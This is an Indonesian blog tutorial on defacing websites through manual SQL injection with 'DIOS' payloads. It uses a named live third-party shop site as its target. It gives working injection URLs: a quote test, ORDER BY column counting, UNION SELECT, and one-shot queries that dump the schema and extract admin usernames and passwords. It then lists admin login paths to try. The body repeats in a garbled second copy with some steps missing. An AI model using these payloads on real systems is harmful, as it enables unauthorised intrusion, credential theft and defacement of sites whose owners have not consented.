CARA DEFACE SQL INJECTION MANUAL WITH DIOS
Kali ini saya akan memberikan tutorial SQL Injection Manual
Baca Juga
Oke.... disimak ya hehe
BAHAN
1.internet cuy yakali kaga pake internet
2.dork *kalian bisa cek dork disini > Dork SQL injection
3.web yg vuln sql injection
*disini saya ada live target :
http://rahmadewifurniture.com/media.php?module=detailproduk&id=460
yups langsung saja
- sekarang kita tambahkan '
jadinya seperti ini :http://rahmadewifurniture.com/media.php?module=detailproduk&id=460'
- yaps disini kita menemukan error atau ada gambar yg hilang.
*seperti ini:
- lalu kita disini melakukan perintah+order+by+1--+
- misal seperti ini :
- lakukan order by hingga menemukan error lagi seperti ini saya menemuka error di angka 16.
- berarti kita hanya ambil sampai 15 saja karena error nya di 16.
- selanjutnya kita melakukan perintah+union+select+ dan menambahkan [ - ] sebelum angka
- jadinya seperti ini :http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
- yaps disini muncul angka togel ya itu 14 dan 3.
- agar tidak lama untuk mencari database table dan column kita menggunakan dios saja
- masukan dios ini
[/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/ ]
- yaps disini langsung keluar database table dan column nya.
- selanjutnya kita tinggal ambil user / password admin.
- dengan cara memasukan dios berikut
[(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatable)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namacolum,0x203a3a20,namacolum))))x) ]
- bisa dibilang seperti ini :
http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admins)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4,5,6,7,8,9,10,11,12,13,14,15--+
*sesuaikan nama table dan colum nya ya..
- dan yaps sekarang kita sudah mendapatkan user dan password admin nya.
- tinggal kalian cari saja halaman admin nya biasanya di
* -/admin
-/administrator
-/login.php
-/admin.php
- jika belum ketemu juga kalian bisa download dirbuster atau memakai admin finder online. :)
Yups cukup sekian tutorial kali ini semoga bermanfaat.
See you on the next tutorial....
1.internet cuy yakali kaga pake internet
2.dork *kalian bisa cek dork disini > Dork SQL injection
*disini saya ada live target :
http://rahmadewifurniture.com/media.php?module=detailproduk&id=460
yups langsung saja
- sekarang kita tambahkan '
jadinya seperti ini :http://rahmadewifurniture.com/media.php?module=detailproduk&id=460'
- yaps disini kita menemukan error atau ada gambar yg hilang.
*seperti ini:
- misal seperti ini :
- selanjutnya kita melakukan perintah+union+select+ dan menambahkan [ - ] sebelum angka
- jadinya seperti ini :http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+
- yaps disini muncul angka togel ya itu 14 dan 3.
- agar tidak lama untuk mencari database table dan column kita menggunakan dios saja
- masukan dios ini
[/*!00000/*!00000(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,database(),0x3a3a,table_name,0x203a3a20,column_name))))x)*/ ]
- yaps disini langsung keluar database table dan column nya.
- dengan cara memasukan dios berikut
[(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(namatable)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,namacolum,0x203a3a20,namacolum))))x) ]
- bisa dibilang seperti ini :
http://rahmadewifurniture.com/media.php?module=detailproduk&id=-460'+union+select+1,2,(/*!50000select*/(@x)from(/*!50000select*/(@x:=0x00),(/*!50000select*/(@x)from(admins)where(@x)in(@x:=/*!50000concat*/(0x20,@x,0x3c62723e,username,0x203a3a20,password))))x),4,5,6,7,8,9,10,11,12,13,14,15--+
*sesuaikan nama table dan colum nya ya..
- dan yaps sekarang kita sudah mendapatkan user dan password admin nya.
* -/admin
-/administrator
-/login.php
-/admin.php
- jika belum ketemu juga kalian bisa download dirbuster atau memakai admin finder online. :)
Yups cukup sekian tutorial kali ini semoga bermanfaat.
See you on the next tutorial....
0 Response to "CARA DEFACE SQL INJECTION MANUAL WITH DIOS"
Post a Comment